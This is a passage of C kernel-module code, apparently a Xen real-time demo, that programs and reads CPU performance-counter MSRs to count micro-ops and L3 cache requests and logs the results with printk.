rtxen_write_msr(eax,ecx);
ecx = 0xc2;
eax = 1;
edx = 2;
rtxen_read_msr(&ecx, &eax, &edx);
printk(KERN_INFO "UOPS Demo: read_msr: edx=%#010x, eax=%#010x\n", edx, eax);
break;
case L3:
eax = 0;
SET_MSR_USR_BIT(eax);
SET_MSR_OS_BIT(eax);
SET_EVENT_MASK(eax, L3_ALLREQ_EVENT, L3_ALLREQ_MASK);
eax |= MSR_ENFLAG;
eax |= (1<<20); //INT bit: counter overflow
ecx = PERFEVTSEL2;
printk(KERN_INFO "before wrmsr: eax=%#010x, ecx=%#010x\n", eax, ecx);
rtxen_write_msr(eax, ecx);
printk(KERN_INFO "after wrmsr: eax=%#010x, ecx=%#010x\n", eax, ecx);
printk(KERN_INFO "L3 all request set MSR PMC2\n");
printk(KERN_INFO "delay by access an array\n");
delay();
eax &= (~MSR_ENFLAG);
rtxen_write_msr(eax, ecx);
printk(KERN_INFO "stop the counter, eax=%#010x\n", eax);
ecx = PMC2;
eax = 1;
edx = 2;
printk(KERN_INFO "rdmsr: ecx=%#010x\n", ecx);
rtxen_read_msr(&ecx, &eax, &edx); /*need to pass into address!*/
l3_all = ( ((uint64_t) edx << 32) | eax );
printk(KERN_INFO "rdmsr: L3 all request is %llu (%#010lx)\n", l3_all, (unsigned long)l3_all);
break;
default:
printk(KERN_INFO "operation not implemented yet\n");
}

Resources